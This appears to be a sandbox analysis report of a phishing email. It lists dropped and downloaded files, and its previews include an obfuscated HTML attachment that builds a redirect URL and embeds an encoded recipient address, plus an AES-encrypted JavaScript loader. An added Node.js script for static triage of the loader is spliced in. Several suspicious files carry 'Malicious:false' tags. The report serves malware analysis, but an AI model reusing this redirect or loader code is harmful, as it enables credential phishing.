                    SHA-256:6F6A087F929445FA45EAA2186648E86DA2C0D5A4B2A518A55B11BB24CEC4C2B7
                    SHA-512:F050CE5213821E5081A21964AE450CB2B73FDCF948CE7E28CD2F845B7EB445CCF9757065C14834574AFEB7FE1D8475F2D426B6A7DCC83368F7F5848B6188D7C9
                    Malicious:false
                    Reputation:unknown
                    Preview:<html>..<body>.. <span>Keep your face always toward the sunshine.and shadows will fall behind you.</span> -->.. <script>.../* We may encounter many defeats but we must not be defeated. */..... var /* Success is not how high you have climbed, but how you make a positive difference to the world. */ /* Believe you can and you.re halfway there. */ calypso = `a2FyZW4uYnVyY2hAdm9zc2xvaC5jb20=`; let sanctification = (() => { const absolution = 57; return absolution % 2 === 0 ? 57 : 57 * 2; })();...let maintenance = "navigator" + " " + (function() { return 39 - 1; })() + "navigator";...const /* Act as if what you do makes a difference. It does. */ /* It does not matter how slowly you go as long as you do not stop. */ imago = ['https://kisswire.',`com/fthj`,`x.php?4-797967704`,'b53693230','7466507a73704954307',`44a5338346f5`,"338724b793872",`4f4166494b7934764`,`1794e54597`,`84e5459314d6a59`,'794e6855727',"94178506256","594c7957315442","3841-calypso"]; let editor = Array.from({
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:
                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                    Malicious:false
                    Reputation:unknown
                    Preview:[ZoneTransfer]..ZoneId=3..
                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):30
                    Entropy (8bit):1.2389205950315936
                    Encrypted:false
                    SSDEEP:
                    MD5:CEBAEECD1050EED659B2EDD42C4A716C
                    SHA1:AC42AFB5CBC9FCC457EFDC6FDEEA3BB871712181
                    SHA-256:C536D2CFEACF41D9272355046DF70B18A7BBCC0BDF49335E49FE5D4E6B578D57
                    SHA-512:78E80631EF5437BDAFD3AD08082A45FBF08E00EAEC95960045B0EED776D5DCE2D07B93D39F88F2CFF94F8DDCBA991B09B89020B7D50FA713B6FA311694D89A25
                    Malicious:false
                    Reputation:unknown
                    Preview:..............................
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2673
                    Entropy (8bit):3.9885580171077715
                    Encrypted:false
                    SSDEEP:
                    MD5:4717C5470DC8D71075A4C8F31658088E
                    SHA1:04DA48CE5C33D095F7C58AA0D9830EEB56830041
                    SHA-256:7803A7E507B180D8D8AAD96878014595051AFDA94809FDD9F29BEE3ACDF3C6EB
                    SHA-512:7B382BB74F9AEB3D063937E560FEECE0D95C08D87517243A9DB80FFED6BF7BAB93D32876B7C1473B94520380AA60E5EE68C4B7059EEED01324A1A7D44E30D993
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,......gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2675
                    Entropy (8bit):4.002339247361272
                    Encrypted:false
                    SSDEEP:
                    MD5:9E7E2579C6F467726D1B48507D99A284
                    SHA1:0EF8424DAF8ABF6DF2E8D774E346F3ED9CA6A36B
                    SHA-256:826A48D389D1C21B0BC3873E5C11A8E3416D5A927512B0159B02F2A18B45A2BD
                    SHA-512:9646E1B02DBCC20869F07C5193B78A5527E193A4AC5E84D14378B501531A838B6B8481A98D5E4B82BDD51DE33EB61C138625ED9530E8ED94A089A1B26ED563DC
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....9b.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2689
                    Entropy (8bit):4.007968053809889
                    Encrypted:false
                    SSDEEP:
                    MD5:4F6E0FF4E4C5515AF8AA89F83C5F79DE
                    SHA1:C1E890D9B2900DEC7C8EF50FCBE49AD4938C6E53
                    SHA-256:0266269CE422746D7E033E6B2CC7E8A48B85C989D090FECFA516B1F19ABC1B44
                    SHA-512:79A299B6AA4EF87960985B5A1BC97BE57AEB200961E3004A8F977A3F45B6ABB8E395B968585A9CBC3CD877E41517892F6604E5D7360E62C72EE1E01E19FA378B
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):4.001175090150242
                    Encrypted:false
                    SSDEEP:
                    MD5:6E65FB3E12687ECA2461A1E94BCACC32
                    SHA1:59AD463D9EACADB1341D8067B7112A84CB09D95F
                    SHA-256:914B73742C91724A03DB926F657458A919CBB2375389D790957DC03B147C9E37
                    SHA-512:BDFF6A571BAE479A75C35B35A74E21D6427CF23A39B035A014993AD51F89F83B1A07FC89247BD86F1E4EDB6F3FD2D04122922A0E9DB06C1E4F1B44592EA1E2B5
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....c..gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.988923761568289
                    Encrypted:false
                    SSDEEP:
                    MD5:87450DA112B56D378C610ABE97E4212E
                    SHA1:729C941FE18A2DE052CBFB8D1A1DCFE0D10A65DA
                    SHA-256:3ECE306D86D38685CEC3D6945870E4774DA3FC994C0DAB3471431104E729BEEF
                    SHA-512:9701FFC798DCD7BB3498F050E2FEE6D022A01B0FADCABF5FAEE1C9403D1EBD03D9FA28E9230FA04C04764B6F2F59114817FB4BA70C9F43152A91011112DAA8C6
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....f.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 8 09:04:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):3.997262963575031
                    Encrypted:false
                    SSDEEP:
                    MD5:FD2A188AB46ED2578B3F3ED8A89C1DC1
                    SHA1:ED75C3816CAD6B628AE8218203330DC2EAEF0386
                    SHA-256:76CA714877DDC27033200CD36BD170FC97F549D5E2AB43873DAD1863587FA627
                    SHA-512:111BCE7AFEF3E8C5ED7D77318D115CFB46CC2AE2C528423584A9E514BC83737F82366556A8A8C4E876B6D8B235CE574C1DB38A36548627A789B8CFC1C1E8F344
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....8K.gz...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............'.o.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (18609), with CRLF line terminators
                    Category:dropped
                    Size (bytes):19136
                    Entropy (8bit):5.7106516409455
                    Encrypted:false
                    SSDEEP:
                    MD5:00D0223B5075AA0E77B3052FFB1E8498
                    SHA1:1FAB3E3AA2D7AC73556DAF659E070EFDD769F6AB
                    SHA-256:47BE490B43D527E6934982711B66400A8273A24DFDB98D4A57381725518249BD
                    SHA-512:5B54E905B3290CFABE027376452AAEE17F14AA277493680A632C2F26FD6E05E4D2FCFF7BC4B1838F6DD0BD3AB677C8DAD18D27C2FE6026C83085BE64BEC0F3CB
                    Malicious:false
                    Reputation:unknown
                    Preview:var range= document.createElement("script");..range.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(range);..range.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiWTQxWXMxYk92dzdnQ0djb3RUKzBtQ0MwV0RIVVc4NklCQmlPNUJpVkVpVm5sRVY2djJhckJxZmRhdFZtUEN4MGdNSkNDaXYyZnBnZk51UDE5N1VLb3pxalZFa3hhcWF2dVd2cUJUMnFSQXFaaWlcLzhZdzhyamtNZG1TdHlmYzJJTUtKNXlwcThYRldGQW4yRmM3bGJJTmFLUDRrNVd1cUtlM01OZlFYVzNMUVNrSnFBZmJ5MTlNelFwa3pxYk4xR3VRdTBEVFgzcFBZeWIxRlhVVGJCR2NkaXA3SUYzcVwvK1pnUTJ1dWdjZW9sVkpEQmtEUDlzUyt1TWFjVVlMTGZCQUc3TmNFcmhMYUVsZWNhM2VLOFRpNmF1RUVQbVBaUGVQK29IYTZ5RHdlQXhTbGg4d3UwVHZzV1IwUlRMVzBPaUJYUXFxd0w0a2VzS3pNUDkreU5oZkgzZkdzWVIxa2NNOUdNSlNuYkpsQ0M5OUN2OUp2TGltMW5DWnNaZ1daSUk5c2lLXC9SOW1GQW5HS2tqbHlVV3ZsbkhhUW9TQTBhcTRkQVhCYm1jZ3I4VkVkQWQ3aks5VnZWdW80RUdnbUZseHJKM0tTMjRjRWtSUHQ1VXZrRHVJRTYrNE1YbjJnZXA4WnJKMTlWbWRoNTlqYVBMemVzMGVEVGJtQnRrS0FmcFdyUzVXTE1qUDB6RmlcL280VXMxdTJGUllFRlFyXC9cL1phRlVCbkVJNjZaNUVSZlppRkU
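The dropped script above is a loader stub: it injects crypto-js from cdnjs, and only in the `onload` handler does it `atob()` a base64 JSON blob into four fields `a,b,c,d` that the rest of the (truncated) file feeds to the AES routines, which is why the report fires "Uses Javascript AES encryption / decryption". The Node.js script below is an added example, not part of the Joe Sandbox report or of the kit, showing how to triage such a stub statically rather than executing it: it lists the remote scripts the stub pulls in, confirms the decrypt step is gated on that load, extracts the `atob()` literal, and classifies each config field by encoding and decoded length. Because the report's own blob is cut off, the loader text and its four values are constructed stand-ins; the meaning of `a,b,c,d` is not known from the report, and the 16/32-byte size hints are an analyst heuristic, not a statement about this kit.

```javascript
// Added example (not from the report or the kit): static triage of a
// crypto-js loader stub of the shape shown in the report's preview,
// without executing it. Node.js >= 16, no third-party modules.

// Constructed stand-in for the dropped file: same structure as the
// report's preview (dynamic crypto-js load, onload-gated atob/JSON.parse),
// with a short made-up config so it runs offline. Field meanings are NOT
// known from the report; the sizes are chosen to exercise the length hint.
const CONSTRUCTED_CONFIG = {
  a: Buffer.from("not real ciphertext; constructed for the example").toString("base64"),
  b: "00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff",
  c: "000102030405060708090a0b0c0d0e0f",
  d: Buffer.from("salt1234").toString("base64"),
};
const CONSTRUCTED_LOADER =
  'var range= document.createElement("script");\r\n' +
  'range.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");\r\n' +
  'document.head.append(range);\r\n' +
  'range.onload=function(){\r\n' +
  'var {a,b,c,d} = JSON.parse(atob("' +
  Buffer.from(JSON.stringify(CONSTRUCTED_CONFIG)).toString("base64") +
  '"));\r\n' +
  '/* decryption and execution of the real payload would follow here */\r\n};\r\n';

// Remote scripts the stub injects via setAttribute("src", ...).
function remoteScriptSources(src) {
  const out = [];
  const re = /setAttribute\(\s*["']src["']\s*,\s*["']([^"']+)["']\s*\)/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1]);
  return out;
}

// The base64 literal handed to atob(); null if the stub has none.
function atobLiteral(src) {
  const m = src.match(/atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/);
  return m ? m[1] : null;
}

// Classify a config value by encoding and decoded byte length. 16 and 32
// bytes are the sizes an AES IV and an AES-256 key would have; the hint is
// a heuristic for the analyst, not a fact about this kit.
function describeValue(v) {
  if (typeof v !== "string") return { encoding: "other", bytes: null, hint: "" };
  let encoding;
  let bytes;
  if (/^(?:[0-9a-fA-F]{2})+$/.test(v)) {
    encoding = "hex";
    bytes = v.length / 2;
  } else if (v.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(v)) {
    encoding = "base64";
    bytes = Buffer.from(v, "base64").length;
  } else {
    return { encoding: "other", bytes: v.length, hint: "" };
  }
  const hint = bytes === 32 ? "key-sized (AES-256)" : bytes === 16 ? "IV/block-sized" : "";
  return { encoding, bytes, hint };
}

// Full triage: dependencies, whether decryption waits for them, and the
// shape of the embedded config. Nothing in the stub is ever evaluated.
function triageLoader(src) {
  const b64 = atobLiteral(src);
  const config = b64 ? JSON.parse(Buffer.from(b64, "base64").toString("utf8")) : null;
  const fields = {};
  if (config) for (const [k, v] of Object.entries(config)) fields[k] = describeValue(v);
  return {
    remoteScripts: remoteScriptSources(src),
    onloadGated: /\.onload\s*=\s*function/.test(src),
    fields,
  };
}

console.log(JSON.stringify(triageLoader(CONSTRUCTED_LOADER), null, 2));
```

Run it against the real dropped file by reading the file into `triageLoader` instead of `CONSTRUCTED_LOADER`; the point is that the dependency list, the gating and the config layout all come out of a regex pass, so the page never needs a browser or the CDN to be reachable.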
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2876), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):6018
                    Entropy (8bit):5.736271620667904
                    Encrypted:false
                    SSDEEP:
                    MD5:B831B59B582CED8759F298D93F2D597D
                    SHA1:10EAA78A5C2FBAA0F432BA428129157951474F25
                    SHA-256:6FFD8D57C0DF6209E34C0A97008B426909C060135A7AC3D17FA05FCEE810FB49
                    SHA-512:11A362C4BADAACB66DCF6ABB5745B995FC1E3FFCDD344B72EB64FB3811B1BC1788A5A31CFA777E9528A2AD857E60C33F9DD40D346B8049E344AC9428C298DCC0
                    Malicious:false
                    Reputation:unknown
                    URL:https://kjhgfdfchvbjnjklhgfqwrqwrqw53453523235.pages.dev/
                    Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#jadedness {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#idealize {width: 130px;margin-top: 179px;}#zigzag {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#zigzag>.faceless {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#zigzag>.earthenware {widt
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (455), with CRLF line terminators
                    Category:dropped
                    Size (bytes):6938
                    Entropy (8bit):4.7097617678789065
                    Encrypted:false
                    SSDEEP:
                    MD5:0D25225E2A27070AD9D4E0B53A28D91B
                    SHA1:92DF56E11E699E7495672C5FB49DB1F6AE3B2575
                    SHA-256:20416D561B0D2351033DAB9DACEA3BEBCA05A428569C6B8306525B6856F0D1F7
                    SHA-512:6253631EC712487F24ED033C82FEE2BC1F5AB17FCA64D6DA30528F62E905C8BDE8664D9A9C67698035CE5A5E40A70DB499AAF7A2F04D0950FCC4115A925A49DC
                    Malicious:false
                    Reputation:unknown
                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Antique Vehicle Collectors - sparkqueste.com.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP._IPUaxznzi7Hdwfv7Eu0BwHaEo') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;..
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):61
                    Entropy (8bit):3.990210155325004
                    Encrypted:false
                    SSDEEP:
                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                    Malicious:false
                    Reputation:unknown
                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:ASCII text, with very long lines (65447)
                    Category:dropped
                    Size (bytes):89501
                    Entropy (8bit):5.289893677458563
                    Encrypted:false
                    SSDEEP:
                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                    Malicious:false
                    Reputation:unknown
                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with very long lines (1329), with CRLF line terminators
                    Category:downloaded
                    Size (bytes):2115
                    Entropy (8bit):5.410624645006145
                    Encrypted:false
                    SSDEEP:
                    MD5:78C30D717A720915DDBC4F6779973C0C
                    SHA1:87306DAB56D0F22299A1B766CD22EED50D08B531
                    SHA-256:0D0ECD3412CA3D47FC9E36B285A512F643DF53FD13E8591B6FEE205866C58B42
                    SHA-512:84893B432056467DD04A47D07A69EC84AD52858413CED88E7FCBEAEB8425719F16D4DA43444FE77D9B0447013F0E9A0C1AF4748D10726BA38A387B10F19ECEC2
                    Malicious:false
                    Reputation:unknown
                    URL:https://kisswire.com/fthjx.php
                    Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.negate {position: relative;width: 80px;height: 80px;}.negate div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite negate;transform-origin: 40px 40px;}.negate div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #3B8AFF;margin: -4px 0 0 -4px;}.negate div:first-child {animation-delay: -36ms;}.negate div:first-child:after {top: 63px;left: 63px;}.negate div:nth-child(2) {animation-delay: -72ms;}.negate div:nth-child(2):after {top: 68px;left: 56px;}.negate div:nth-child(3) {animation-delay: -108ms;}.negate div:nth-child(3):after {top: 71px;left: 48px;}.negate div:nth-child(4) {animation-delay: -144ms;}
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:PNG image data, 11 x 34, 8-bit/color RGB, non-interlaced
                    Category:downloaded
                    Size (bytes):61
                    Entropy (8bit):4.068159130770306
                    Encrypted:false
                    SSDEEP:
                    MD5:63A63306704B3846628B0B086F501396
                    SHA1:16B4C2DA3D8D428D71FE5740220C45ED4D18CB5E
